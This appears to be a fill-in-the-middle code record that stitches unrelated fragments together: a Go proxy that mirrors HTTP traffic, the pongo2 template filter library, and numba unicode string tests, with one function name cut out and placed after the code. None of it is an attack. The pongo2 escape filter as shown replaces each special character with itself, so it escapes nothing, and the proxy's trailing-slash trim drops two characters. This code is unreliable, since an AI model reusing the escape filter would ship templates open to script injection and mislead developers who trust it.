if (right-left) <= (right_count-left_count):
right = right_count
left = left_count
return[left, right] |
mirror.go | package mirror
import (
"log"
"github.com/petereps/gomirror/pkg/docker"
"bytes"
"fmt"
"io/ioutil"
"net/http"
"net/http/httputil"
"net/url"
"time"
"github.com/docker/docker/client" |
"github.com/sirupsen/logrus"
)
// Mirror proxies requests to an upstream server, and
// mirrors request to a mirror server
type Mirror struct {
*httputil.ReverseProxy
client *http.Client
cfg *Config
}
// New returns an initialized Mirror instance
func New(cfg *Config) (*Mirror, error) {
primaryServerURL, err := url.Parse(cfg.Primary.URL)
if err != nil {
return nil, err
}
proxy := httputil.NewSingleHostReverseProxy(primaryServerURL)
if cfg.Primary.DockerLookup.Enabled {
cli, err := client.NewEnvClient()
if err != nil {
log.Fatalf("could not get docker client: %+v", err)
}
dockerDNS := docker.NewDNSResolver(cli, cfg.Primary.DockerLookup.HostIdentifier)
proxy = dockerDNS.ReverseProxy(primaryServerURL)
}
return &Mirror{
proxy,
&http.Client{
Timeout: time.Minute * 1,
},
cfg,
}, nil
}
func (m *Mirror) mirror(proxyReq *http.Request) {
entry := logrus.WithField("mirror_url", proxyReq.URL.String())
entry.Debugln("mirroring")
response, err := m.client.Do(proxyReq)
if err != nil {
entry.WithError(err).
Debugln("error in mirrored request")
return
}
body, err := ioutil.ReadAll(response.Body)
if err != nil {
entry.WithError(err).
Debugln("error reading mirrored request")
return
}
entry.WithField("response", string(body)).
Debugln("mirrored response")
}
func (m *Mirror) ServeHTTP(w http.ResponseWriter, r *http.Request) {
// add path and query string (doing this manually so things like localhost work to mirror)
path := r.URL.EscapedPath()
query := r.URL.RawQuery
proxyReqURL := m.cfg.Mirror.URL
lastChar := proxyReqURL[len(proxyReqURL)-1]
if lastChar == '/' {
proxyReqURL = proxyReqURL[:len(proxyReqURL)-2]
}
if query != "" {
query = "?" + query
}
proxyReqURL = fmt.Sprintf("%s%s%s", proxyReqURL, path, query)
logrus.WithField("mirror_url", proxyReqURL).Debugln()
proxyReq, proxyReqErr := http.NewRequest(
r.Method, proxyReqURL, nil,
)
if proxyReqErr != nil {
logrus.WithError(proxyReqErr).
Errorln("error creating mirroring request")
}
if m.cfg.Primary.DoMirrorBody {
// we need to buffer the body in order to send to both upstream
// requests
body, err := ioutil.ReadAll(r.Body)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
r.Body = ioutil.NopCloser(bytes.NewReader(body))
proxyReq.Body = ioutil.NopCloser(bytes.NewReader(body))
}
if m.cfg.Primary.DoMirrorHeaders {
for key, value := range r.Header {
proxyReq.Header.Set(key, value[0])
}
}
for _, header := range m.cfg.Mirror.Headers {
proxyReq.Header.Set(header.Key, header.Value)
}
for _, header := range m.cfg.Primary.Headers {
r.Header.Set(header.Key, header.Value)
}
if proxyReqErr == nil {
go m.mirror(proxyReq)
}
m.ReverseProxy.ServeHTTP(w, r)
}
// Serve serves the mirror
func (m *Mirror) Serve(address string) error {
return http.ListenAndServe(address, m)
} | |
filters_builtin.go | package pongo2
/* Filters that are provided through github.com/flosch/pongo2-addons:
------------------------------------------------------------------
filesizeformat
slugify
timesince
timeuntil
Filters that won't be added:
----------------------------
get_static_prefix (reason: web-framework specific)
pprint (reason: python-specific)
static (reason: web-framework specific)
Reconsideration (not implemented yet):
--------------------------------------
force_escape (reason: not yet needed since this is the behaviour of pongo2's escape filter)
safeseq (reason: same reason as `force_escape`)
unordered_list (python-specific; not sure whether needed or not)
dictsort (python-specific; maybe one could add a filter to sort a list of structs by a specific field name)
dictsortreversed (see dictsort)
*/
import (
"bytes"
"fmt"
"math/rand"
"net/url"
"regexp"
"strconv"
"strings"
"time"
"unicode/utf8"
)
func init() {
rand.Seed(time.Now().Unix())
RegisterFilter("escape", filterEscape)
RegisterFilter("safe", filterSafe)
RegisterFilter("escapejs", filterEscapejs)
RegisterFilter("add", filterAdd)
RegisterFilter("addslashes", filterAddslashes)
RegisterFilter("capfirst", filterCapfirst)
RegisterFilter("center", filterCenter)
RegisterFilter("cut", filterCut)
RegisterFilter("date", filterDate)
RegisterFilter("default", filterDefault)
RegisterFilter("default_if_none", filterDefaultIfNone)
RegisterFilter("divisibleby", filterDivisibleby)
RegisterFilter("first", filterFirst)
RegisterFilter("floatformat", filterFloatformat)
RegisterFilter("get_digit", filterGetdigit)
RegisterFilter("iriencode", filterIriencode)
RegisterFilter("join", filterJoin)
RegisterFilter("last", filterLast)
RegisterFilter("length", filterLength)
RegisterFilter("length_is", filterLengthis)
RegisterFilter("linebreaks", filterLinebreaks)
RegisterFilter("linebreaksbr", filterLinebreaksbr)
RegisterFilter("linenumbers", filterLinenumbers)
RegisterFilter("ljust", filterLjust)
RegisterFilter("lower", filterLower)
RegisterFilter("make_list", filterMakelist)
RegisterFilter("phone2numeric", filterPhone2numeric)
RegisterFilter("pluralize", filterPluralize)
RegisterFilter("random", filterRandom)
RegisterFilter("removetags", filterRemovetags)
RegisterFilter("rjust", filterRjust)
RegisterFilter("slice", filterSlice)
RegisterFilter("split", filterSplit)
RegisterFilter("stringformat", filterStringformat)
RegisterFilter("striptags", filterStriptags)
RegisterFilter("time", filterDate) // time uses filterDate (same golang-format)
RegisterFilter("title", filterTitle)
RegisterFilter("truncatechars", filterTruncatechars)
RegisterFilter("truncatechars_html", filterTruncatecharsHTML)
RegisterFilter("truncatewords", filterTruncatewords)
RegisterFilter("truncatewords_html", filterTruncatewordsHTML)
RegisterFilter("upper", filterUpper)
RegisterFilter("urlencode", filterUrlencode)
RegisterFilter("urlize", filterUrlize)
RegisterFilter("urlizetrunc", filterUrlizetrunc)
RegisterFilter("wordcount", filterWordcount)
RegisterFilter("wordwrap", filterWordwrap)
RegisterFilter("yesno", filterYesno)
RegisterFilter("float", filterFloat) // pongo-specific
RegisterFilter("integer", filterInteger) // pongo-specific
}
func filterTruncatecharsHelper(s string, newLen int) string {
runes := []rune(s)
if newLen < len(runes) {
if newLen >= 3 {
return fmt.Sprintf("%s...", string(runes[:newLen-3]))
}
// Not enough space for the ellipsis
return string(runes[:newLen])
}
return string(runes)
}
func filterTruncateHTMLHelper(value string, newOutput *bytes.Buffer, cond func() bool, fn func(c rune, s int, idx int) int, finalize func()) {
vLen := len(value)
var tagStack []string
idx := 0
for idx < vLen && !cond() {
c, s := utf8.DecodeRuneInString(value[idx:])
if c == utf8.RuneError {
idx += s
continue
}
if c == '<' {
newOutput.WriteRune(c)
idx += s // consume "<"
if idx+1 < vLen {
if value[idx] == '/' {
// Close tag
newOutput.WriteString("/")
tag := ""
idx++ // consume "/"
for idx < vLen {
c2, size2 := utf8.DecodeRuneInString(value[idx:])
if c2 == utf8.RuneError {
idx += size2
continue
}
// End of tag found
if c2 == '>' {
idx++ // consume ">"
break
}
tag += string(c2)
idx += size2
}
if len(tagStack) > 0 {
// Ideally, the close tag is TOP of tag stack
// In malformed HTML, it must not be, so iterate through the stack and remove the tag
for i := len(tagStack) - 1; i >= 0; i-- {
if tagStack[i] == tag {
// Found the tag
tagStack[i] = tagStack[len(tagStack)-1]
tagStack = tagStack[:len(tagStack)-1]
break
}
}
}
newOutput.WriteString(tag)
newOutput.WriteString(">")
} else {
// Open tag
tag := ""
params := false
for idx < vLen {
c2, size2 := utf8.DecodeRuneInString(value[idx:])
if c2 == utf8.RuneError {
idx += size2
continue
}
newOutput.WriteRune(c2)
// End of tag found
if c2 == '>' {
idx++ // consume ">"
break
}
if !params {
if c2 == ' ' {
params = true
} else {
tag += string(c2)
}
}
idx += size2
}
// Add tag to stack
tagStack = append(tagStack, tag)
}
}
} else {
idx = fn(c, s, idx)
}
}
finalize()
for i := len(tagStack) - 1; i >= 0; i-- {
tag := tagStack[i]
// Close everything from the regular tag stack
newOutput.WriteString(fmt.Sprintf("</%s>", tag))
}
}
func filterTruncatechars(in *Value, param *Value) (*Value, *Error) {
s := in.String()
newLen := param.Integer()
return AsValue(filterTruncatecharsHelper(s, newLen)), nil
}
func filterTruncatecharsHTML(in *Value, param *Value) (*Value, *Error) {
value := in.String()
newLen := max(param.Integer()-3, 0)
newOutput := bytes.NewBuffer(nil)
textcounter := 0
filterTruncateHTMLHelper(value, newOutput, func() bool {
return textcounter >= newLen
}, func(c rune, s int, idx int) int {
textcounter++
newOutput.WriteRune(c)
return idx + s
}, func() {
if textcounter >= newLen && textcounter < len(value) {
newOutput.WriteString("...")
}
})
return AsSafeValue(newOutput.String()), nil
}
func filterTruncatewords(in *Value, param *Value) (*Value, *Error) {
words := strings.Fields(in.String())
n := param.Integer()
if n <= 0 {
return AsValue(""), nil
}
nlen := min(len(words), n)
out := make([]string, 0, nlen)
for i := 0; i < nlen; i++ {
out = append(out, words[i])
}
if n < len(words) {
out = append(out, "...")
}
return AsValue(strings.Join(out, " ")), nil
}
func filterTruncatewordsHTML(in *Value, param *Value) (*Value, *Error) {
value := in.String()
newLen := max(param.Integer(), 0)
newOutput := bytes.NewBuffer(nil)
wordcounter := 0
filterTruncateHTMLHelper(value, newOutput, func() bool {
return wordcounter >= newLen
}, func(_ rune, _ int, idx int) int {
// Get next word
wordFound := false
for idx < len(value) {
c2, size2 := utf8.DecodeRuneInString(value[idx:])
if c2 == utf8.RuneError {
idx += size2
continue
}
if c2 == '<' {
// HTML tag start, don't consume it
return idx
}
newOutput.WriteRune(c2)
idx += size2
if c2 == ' ' || c2 == '.' || c2 == ',' || c2 == ';' {
// Word ends here, stop capturing it now
break
} else {
wordFound = true
}
}
if wordFound {
wordcounter++
}
return idx
}, func() {
if wordcounter >= newLen {
newOutput.WriteString("...")
}
})
return AsSafeValue(newOutput.String()), nil
}
func filterEscape(in *Value, param *Value) (*Value, *Error) {
output := strings.Replace(in.String(), "&", "&", -1)
output = strings.Replace(output, ">", ">", -1)
output = strings.Replace(output, "<", "<", -1)
output = strings.Replace(output, "\"", """, -1)
output = strings.Replace(output, "'", "'", -1)
return AsValue(output), nil
}
func filterSafe(in *Value, param *Value) (*Value, *Error) {
return in, nil // nothing to do here, just to keep track of the safe application
}
func filterEscapejs(in *Value, param *Value) (*Value, *Error) {
sin := in.String()
var b bytes.Buffer
idx := 0
for idx < len(sin) {
c, size := utf8.DecodeRuneInString(sin[idx:])
if c == utf8.RuneError {
idx += size
continue
}
if c == '\\' {
// Escape seq?
if idx+1 < len(sin) {
switch sin[idx+1] {
case 'r':
b.WriteString(fmt.Sprintf(`\u%04X`, '\r'))
idx += 2
continue
case 'n':
b.WriteString(fmt.Sprintf(`\u%04X`, '\n'))
idx += 2
continue
/*case '\'':
b.WriteString(fmt.Sprintf(`\u%04X`, '\''))
idx += 2
continue
case '"':
b.WriteString(fmt.Sprintf(`\u%04X`, '"'))
idx += 2
continue*/
}
}
}
if (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == ' ' || c == '/' {
b.WriteRune(c)
} else {
b.WriteString(fmt.Sprintf(`\u%04X`, c))
}
idx += size
}
return AsValue(b.String()), nil
}
func filterAdd(in *Value, param *Value) (*Value, *Error) {
if in.IsNumber() && param.IsNumber() {
if in.IsFloat() || param.IsFloat() {
return AsValue(in.Float() + param.Float()), nil
}
return AsValue(in.Integer() + param.Integer()), nil
}
// If in/param is not a number, we're relying on the
// Value's String() convertion and just add them both together
return AsValue(in.String() + param.String()), nil
}
func filterAddslashes(in *Value, param *Value) (*Value, *Error) {
output := strings.Replace(in.String(), "\\", "\\\\", -1)
output = strings.Replace(output, "\"", "\\\"", -1)
output = strings.Replace(output, "'", "\\'", -1)
return AsValue(output), nil
}
func filterCut(in *Value, param *Value) (*Value, *Error) {
return AsValue(strings.Replace(in.String(), param.String(), "", -1)), nil
}
func filterLength(in *Value, param *Value) (*Value, *Error) {
return AsValue(in.Len()), nil
}
func filterLengthis(in *Value, param *Value) (*Value, *Error) {
return AsValue(in.Len() == param.Integer()), nil
}
func filterDefault(in *Value, param *Value) (*Value, *Error) {
if !in.IsTrue() {
return param, nil
}
return in, nil
}
func filterDefaultIfNone(in *Value, param *Value) (*Value, *Error) {
if in.IsNil() {
return param, nil
}
return in, nil
}
func filterDivisibleby(in *Value, param *Value) (*Value, *Error) {
if param.Integer() == 0 {
return AsValue(false), nil
}
return AsValue(in.Integer()%param.Integer() == 0), nil
}
func filterFirst(in *Value, param *Value) (*Value, *Error) {
if in.CanSlice() && in.Len() > 0 {
return in.Index(0), nil
}
return AsValue(""), nil
}
func filterFloatformat(in *Value, param *Value) (*Value, *Error) {
val := in.Float()
decimals := -1
if !param.IsNil() {
// Any argument provided?
decimals = param.Integer()
}
// if the argument is not a number (e. g. empty), the default
// behaviour is trim the result
trim := !param.IsNumber()
if decimals <= 0 {
// argument is negative or zero, so we
// want the output being trimmed
decimals = -decimals
trim = true
}
if trim {
// Remove zeroes
if float64(int(val)) == val {
return AsValue(in.Integer()), nil
}
}
return AsValue(strconv.FormatFloat(val, 'f', decimals, 64)), nil
}
func filterGetdigit(in *Value, param *Value) (*Value, *Error) {
i := param.Integer()
l := len(in.String()) // do NOT use in.Len() here!
if i <= 0 || i > l {
return in, nil
}
return AsValue(in.String()[l-i] - 48), nil
}
const filterIRIChars = "/#%[]=:;$&()+,!?*@'~"
func filterIriencode(in *Value, param *Value) (*Value, *Error) {
var b bytes.Buffer
sin := in.String()
for _, r := range sin {
if strings.IndexRune(filterIRIChars, r) >= 0 {
b.WriteRune(r)
} else {
b.WriteString(url.QueryEscape(string(r)))
}
}
return AsValue(b.String()), nil
}
func filterJoin(in *Value, param *Value) (*Value, *Error) {
if !in.CanSlice() {
return in, nil
}
sep := param.String()
sl := make([]string, 0, in.Len())
for i := 0; i < in.Len(); i++ {
sl = append(sl, in.Index(i).String())
}
return AsValue(strings.Join(sl, sep)), nil
}
func filterLast(in *Value, param *Value) (*Value, *Error) {
if in.CanSlice() && in.Len() > 0 {
return in.Index(in.Len() - 1), nil
}
return AsValue(""), nil
}
func filterUpper(in *Value, param *Value) (*Value, *Error) {
return AsValue(strings.ToUpper(in.String())), nil
}
func filterLower(in *Value, param *Value) (*Value, *Error) {
return AsValue(strings.ToLower(in.String())), nil
}
func filterMakelist(in *Value, param *Value) (*Value, *Error) {
s := in.String()
result := make([]string, 0, len(s))
for _, c := range s {
result = append(result, string(c))
}
return AsValue(result), nil
}
func filterCapfirst(in *Value, param *Value) (*Value, *Error) {
if in.Len() <= 0 {
return AsValue(""), nil
}
t := in.String()
r, size := utf8.DecodeRuneInString(t)
return AsValue(strings.ToUpper(string(r)) + t[size:]), nil
}
func filterCenter(in *Value, param *Value) (*Value, *Error) {
width := param.Integer()
slen := in.Len()
if width <= slen {
return in, nil
}
spaces := width - slen
left := spaces/2 + spaces%2
right := spaces / 2
return AsValue(fmt.Sprintf("%s%s%s", strings.Repeat(" ", left),
in.String(), strings.Repeat(" ", right))), nil
}
func filterDate(in *Value, param *Value) (*Value, *Error) {
t, isTime := in.Interface().(time.Time)
if !isTime {
return nil, &Error{
Sender: "filter:date",
ErrorMsg: "Filter input argument must be of type 'time.Time'.",
}
}
return AsValue(t.Format(param.String())), nil
}
func filterFloat(in *Value, param *Value) (*Value, *Error) {
return AsValue(in.Float()), nil
}
func filterInteger(in *Value, param *Value) (*Value, *Error) {
return AsValue(in.Integer()), nil
}
func filterLinebreaks(in *Value, param *Value) (*Value, *Error) {
if in.Len() == 0 {
return in, nil
}
var b bytes.Buffer
// Newline = <br />
// Double newline = <p>...</p>
lines := strings.Split(in.String(), "\n")
lenlines := len(lines)
opened := false
for idx, line := range lines {
if !opened {
b.WriteString("<p>")
opened = true
}
b.WriteString(line)
if idx < lenlines-1 && strings.TrimSpace(lines[idx]) != "" {
// We've not reached the end
if strings.TrimSpace(lines[idx+1]) == "" {
// Next line is empty
if opened {
b.WriteString("</p>")
opened = false
}
} else {
b.WriteString("<br />")
}
}
}
if opened {
b.WriteString("</p>")
}
return AsValue(b.String()), nil
}
func filterSplit(in *Value, param *Value) (*Value, *Error) {
chunks := strings.Split(in.String(), param.String())
return AsValue(chunks), nil
}
func filterLinebreaksbr(in *Value, param *Value) (*Value, *Error) {
return AsValue(strings.Replace(in.String(), "\n", "<br />", -1)), nil
}
func filterLinenumbers(in *Value, param *Value) (*Value, *Error) {
lines := strings.Split(in.String(), "\n")
output := make([]string, 0, len(lines))
for idx, line := range lines {
output = append(output, fmt.Sprintf("%d. %s", idx+1, line))
}
return AsValue(strings.Join(output, "\n")), nil
}
func filterLjust(in *Value, param *Value) (*Value, *Error) {
times := param.Integer() - in.Len()
if times < 0 {
times = 0
}
return AsValue(fmt.Sprintf("%s%s", in.String(), strings.Repeat(" ", times))), nil
}
func filterUrlencode(in *Value, param *Value) (*Value, *Error) {
return AsValue(url.QueryEscape(in.String())), nil
}
// TODO: This regexp could do some work
var filterUrlizeURLRegexp = regexp.MustCompile(`((((http|https)://)|www\.|((^|[ ])[0-9A-Za-z_\-]+(\.com|\.net|\.org|\.info|\.biz|\.de))))(?U:.*)([ ]+|$)`)
var filterUrlizeEmailRegexp = regexp.MustCompile(`(\w+@\w+\.\w{2,4})`)
func filterUrlizeHelper(input string, autoescape bool, trunc int) string {
sout := filterUrlizeURLRegexp.ReplaceAllStringFunc(input, func(raw_url string) string {
var prefix string
var suffix string
if strings.HasPrefix(raw_url, " ") {
prefix = " "
}
if strings.HasSuffix(raw_url, " ") {
suffix = " "
}
raw_url = strings.TrimSpace(raw_url)
t, err := ApplyFilter("iriencode", AsValue(raw_url), nil)
if err != nil {
panic(err)
}
url := t.String()
if !strings.HasPrefix(url, "http") {
url = fmt.Sprintf("http://%s", url)
}
title := raw_url
if trunc > 3 && len(title) > trunc {
title = fmt.Sprintf("%s...", title[:trunc-3])
}
if autoescape {
t, err := ApplyFilter("escape", AsValue(title), nil)
if err != nil {
panic(err)
}
title = t.String()
}
return fmt.Sprintf(`%s<a href="%s" rel="nofollow">%s</a>%s`, prefix, url, title, suffix)
})
sout = filterUrlizeEmailRegexp.ReplaceAllStringFunc(sout, func(mail string) string {
title := mail
if trunc > 3 && len(title) > trunc {
title = fmt.Sprintf("%s...", title[:trunc-3])
}
return fmt.Sprintf(`<a href="mailto:%s">%s</a>`, mail, title)
})
return sout
}
func | (in *Value, param *Value) (*Value, *Error) {
autoescape := true
if param.IsBool() {
autoescape = param.Bool()
}
return AsValue(filterUrlizeHelper(in.String(), autoescape, -1)), nil
}
func filterUrlizetrunc(in *Value, param *Value) (*Value, *Error) {
return AsValue(filterUrlizeHelper(in.String(), true, param.Integer())), nil
}
func filterStringformat(in *Value, param *Value) (*Value, *Error) {
return AsValue(fmt.Sprintf(param.String(), in.Interface())), nil
}
var reStriptags = regexp.MustCompile("<[^>]*?>")
func filterStriptags(in *Value, param *Value) (*Value, *Error) {
s := in.String()
// Strip all tags
s = reStriptags.ReplaceAllString(s, "")
return AsValue(strings.TrimSpace(s)), nil
}
// https://en.wikipedia.org/wiki/Phoneword
var filterPhone2numericMap = map[string]string{
"a": "2", "b": "2", "c": "2", "d": "3", "e": "3", "f": "3", "g": "4", "h": "4", "i": "4", "j": "5", "k": "5",
"l": "5", "m": "6", "n": "6", "o": "6", "p": "7", "q": "7", "r": "7", "s": "7", "t": "8", "u": "8", "v": "8",
"w": "9", "x": "9", "y": "9", "z": "9",
}
func filterPhone2numeric(in *Value, param *Value) (*Value, *Error) {
sin := in.String()
for k, v := range filterPhone2numericMap {
sin = strings.Replace(sin, k, v, -1)
sin = strings.Replace(sin, strings.ToUpper(k), v, -1)
}
return AsValue(sin), nil
}
func filterPluralize(in *Value, param *Value) (*Value, *Error) {
if in.IsNumber() {
// Works only on numbers
if param.Len() > 0 {
endings := strings.Split(param.String(), ",")
if len(endings) > 2 {
return nil, &Error{
Sender: "filter:pluralize",
ErrorMsg: "You cannot pass more than 2 arguments to filter 'pluralize'.",
}
}
if len(endings) == 1 {
// 1 argument
if in.Integer() != 1 {
return AsValue(endings[0]), nil
}
} else {
if in.Integer() != 1 {
// 2 arguments
return AsValue(endings[1]), nil
}
return AsValue(endings[0]), nil
}
} else {
if in.Integer() != 1 {
// return default 's'
return AsValue("s"), nil
}
}
return AsValue(""), nil
}
return nil, &Error{
Sender: "filter:pluralize",
ErrorMsg: "Filter 'pluralize' does only work on numbers.",
}
}
func filterRandom(in *Value, param *Value) (*Value, *Error) {
if !in.CanSlice() || in.Len() <= 0 {
return in, nil
}
i := rand.Intn(in.Len())
return in.Index(i), nil
}
func filterRemovetags(in *Value, param *Value) (*Value, *Error) {
s := in.String()
tags := strings.Split(param.String(), ",")
// Strip only specific tags
for _, tag := range tags {
re := regexp.MustCompile(fmt.Sprintf("</?%s/?>", tag))
s = re.ReplaceAllString(s, "")
}
return AsValue(strings.TrimSpace(s)), nil
}
func filterRjust(in *Value, param *Value) (*Value, *Error) {
return AsValue(fmt.Sprintf(fmt.Sprintf("%%%ds", param.Integer()), in.String())), nil
}
func filterSlice(in *Value, param *Value) (*Value, *Error) {
comp := strings.Split(param.String(), ":")
if len(comp) != 2 {
return nil, &Error{
Sender: "filter:slice",
ErrorMsg: "Slice string must have the format 'from:to' [from/to can be omitted, but the ':' is required]",
}
}
if !in.CanSlice() {
return in, nil
}
from := AsValue(comp[0]).Integer()
to := in.Len()
if from > to {
from = to
}
vto := AsValue(comp[1]).Integer()
if vto >= from && vto <= in.Len() {
to = vto
}
return in.Slice(from, to), nil
}
func filterTitle(in *Value, param *Value) (*Value, *Error) {
if !in.IsString() {
return AsValue(""), nil
}
return AsValue(strings.Title(strings.ToLower(in.String()))), nil
}
func filterWordcount(in *Value, param *Value) (*Value, *Error) {
return AsValue(len(strings.Fields(in.String()))), nil
}
func filterWordwrap(in *Value, param *Value) (*Value, *Error) {
words := strings.Fields(in.String())
wordsLen := len(words)
wrapAt := param.Integer()
if wrapAt <= 0 {
return in, nil
}
linecount := wordsLen/wrapAt + wordsLen%wrapAt
lines := make([]string, 0, linecount)
for i := 0; i < linecount; i++ {
lines = append(lines, strings.Join(words[wrapAt*i:min(wrapAt*(i+1), wordsLen)], " "))
}
return AsValue(strings.Join(lines, "\n")), nil
}
func filterYesno(in *Value, param *Value) (*Value, *Error) {
choices := map[int]string{
0: "yes",
1: "no",
2: "maybe",
}
paramString := param.String()
customChoices := strings.Split(paramString, ",")
if len(paramString) > 0 {
if len(customChoices) > 3 {
return nil, &Error{
Sender: "filter:yesno",
ErrorMsg: fmt.Sprintf("You cannot pass more than 3 options to the 'yesno'-filter (got: '%s').", paramString),
}
}
if len(customChoices) < 2 {
return nil, &Error{
Sender: "filter:yesno",
ErrorMsg: fmt.Sprintf("You must pass either no or at least 2 arguments to the 'yesno'-filter (got: '%s').", paramString),
}
}
// Map to the options now
choices[0] = customChoices[0]
choices[1] = customChoices[1]
if len(customChoices) == 3 {
choices[2] = customChoices[2]
}
}
// maybe
if in.IsNil() {
return AsValue(choices[2]), nil
}
// yes
if in.IsTrue() {
return AsValue(choices[0]), nil
}
// no
return AsValue(choices[1]), nil
}
| filterUrlize |
test_unicode.py | # -*- coding: utf-8 -*-
# This file tests Python 3.4 style unicode strings
# Tests should be skipped on Python < 3.4
from __future__ import print_function
import sys
from itertools import permutations
from numba import njit
import numba.unittest_support as unittest
from .support import (TestCase, no_pyobj_flags, MemoryLeakMixin)
from numba.errors import TypingError
_py34_or_later = sys.version_info[:2] >= (3, 4)
def literal_usecase():
return '大处着眼,小处着手。'
def passthrough_usecase(x):
return x
def eq_usecase(x, y):
return x == y
def len_usecase(x):
return len(x)
def getitem_usecase(x, i):
return x[i]
def concat_usecase(x, y):
return x + y
def inplace_concat_usecase(x, y):
x += y
return x
def in_usecase(x, y):
return x in y
def lt_usecase(x, y):
return x < y
def le_usecase(x, y):
return x <= y
def gt_usecase(x, y):
return x > y
def ge_usecase(x, y):
return x >= y
def find_usecase(x, y):
return x.find(y)
def startswith_usecase(x, y):
return x.startswith(y)
def endswith_usecase(x, y):
return x.endswith(y)
def split_usecase(x, y):
return x.split(y)
def split_with_maxsplit_usecase(x, y, maxsplit):
return x.split(y, maxsplit)
def split_with_maxsplit_kwarg_usecase(x, y, maxsplit):
return x.split(y, maxsplit=maxsplit)
def split_whitespace_usecase(x):
return x.split()
def join_usecase(x, y):
return x.join(y)
def join_empty_usecase(x):
# hack to make empty typed list
l = ['']
l.pop()
return x.join(l)
class BaseTest(MemoryLeakMixin, TestCase):
def setUp(self):
super(BaseTest, self).setUp()
UNICODE_EXAMPLES = [
'ascii',
'12345',
'1234567890',
'¡Y tú quién te crees?',
'🐍⚡',
'大处着眼,小处着手。',
]
UNICODE_ORDERING_EXAMPLES = [
'',
'a'
'aa',
'aaa',
'b',
'aab',
'ab',
'asc',
'ascih',
'ascii',
'ascij',
'大处着眼,小处着手',
'大处着眼,小处着手。',
'大处着眼,小处着手。🐍⚡',
]
@unittest.skipUnless(_py34_or_later,
'unicode support requires Python 3.4 or later')
class TestUnicode(BaseTest):
def test_literal(self, flags=no_pyobj_flags):
pyfunc = literal_usecase
self.run_nullary_func(pyfunc, flags=flags)
def test_passthrough(self, flags=no_pyobj_flags):
pyfunc = passthrough_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
self.assertEqual(pyfunc(s), cfunc(s))
def test_eq(self, flags=no_pyobj_flags):
pyfunc = eq_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
for b in reversed(UNICODE_EXAMPLES):
self.assertEqual(pyfunc(a, b),
cfunc(a, b), '%s, %s' % (a, b))
def _check_ordering_op(self, usecase):
pyfunc = usecase
cfunc = njit(pyfunc)
# Check comparison to self
for a in UNICODE_ORDERING_EXAMPLES:
self.assertEqual(
pyfunc(a, a),
cfunc(a, a),
'%s: "%s", "%s"' % (usecase.__name__, a, a),
)
# Check comparison to adjacent
for a, b in permutations(UNICODE_ORDERING_EXAMPLES, r=2):
self.assertEqual(
pyfunc(a, b),
cfunc(a, b),
'%s: "%s", "%s"' % (usecase.__name__, a, b),
)
# and reversed
self.assertEqual(
pyfunc(b, a),
cfunc(b, a),
'%s: "%s", "%s"' % (usecase.__name__, b, a),
)
def test_lt(self, flags=no_pyobj_flags):
self._check_ordering_op(lt_usecase)
def test_le(self, flags=no_pyobj_flags):
self._check_ordering_op(le_usecase)
def test_gt(self, flags=no_pyobj_flags):
self._check_ordering_op(gt_usecase)
def test_ge(self, flags=no_pyobj_flags):
self._check_ordering_op(ge_usecase)
def test_len(self, flags=no_pyobj_flags):
pyfunc = len_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
self.assertEqual(pyfunc(s), cfunc(s))
def test_startswith(self, flags=no_pyobj_flags):
pyfunc = startswith_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
for b in [x for x in ['', 'x', a[:-2], a[3:], a, a + a]]:
self.assertEqual(pyfunc(a, b),
cfunc(a, b),
'%s, %s' % (a, b))
def test_endswith(self, flags=no_pyobj_flags):
pyfunc = endswith_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
for b in [x for x in ['', 'x', a[:-2], a[3:], a, a + a]]:
self.assertEqual(pyfunc(a, b),
cfunc(a, b),
'%s, %s' % (a, b))
def test_in(self, flags=no_pyobj_flags):
pyfunc = in_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
extras = ['', 'xx', a[::-1], a[:-2], a[3:], a, a + a]
for substr in [x for x in extras]:
self.assertEqual(pyfunc(substr, a),
cfunc(substr, a),
"'%s' in '%s'?" % (substr, a))
def test_find(self, flags=no_pyobj_flags):
pyfunc = find_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
extras = ['', 'xx', a[::-1], a[:-2], a[3:], a, a + a]
for substr in [x for x in extras]:
self.assertEqual(pyfunc(a, substr),
cfunc(a, substr),
"'%s'.find('%s')?" % (a, substr))
def test_getitem(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
for i in range(-len(s)):
self.assertEqual(pyfunc(s, i),
cfunc(s, i),
"'%s'[%d]?" % (s, i))
def test_getitem_error(self):
self.disable_leak_check()
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
with self.assertRaises(IndexError) as raises:
pyfunc(s, len(s))
self.assertIn('string index out of range', str(raises.exception))
with self.assertRaises(IndexError) as raises:
cfunc(s, len(s))
self.assertIn('string index out of range', str(raises.exception))
def test_slice2(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
for i in list(range(-len(s), len(s))):
for j in list(range(-len(s), len(s))):
sl = slice(i, j)
self.assertEqual(pyfunc(s, sl),
cfunc(s, sl),
"'%s'[%d:%d]?" % (s, i, j))
def test_slice2_error(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
for i in [-2, -1, len(s), len(s) + 1]:
for j in [-2, -1, len(s), len(s) + 1]:
sl = slice(i, j)
self.assertEqual(pyfunc(s, sl),
cfunc(s, sl),
"'%s'[%d:%d]?" % (s, i, j))
def test_slice3(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
for i in range(-len(s), len(s)):
for j in range(-len(s), len(s)):
for k in [-2, -1, 1, 2]:
sl = slice(i, j, k)
self.assertEqual(pyfunc(s, sl),
cfunc(s, sl),
"'%s'[%d:%d:%d]?" % (s, i, j, k))
def test_slice3_error(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
for i in [-2, -1, len(s), len(s) + 1]:
for j in [-2, -1, len(s), len(s) + 1]:
for k in [-2, -1, 1, 2]:
sl = slice(i, j, k)
self.assertEqual(pyfunc(s, sl),
cfunc(s, sl),
"'%s'[%d:%d:%d]?" % (s, i, j, k))
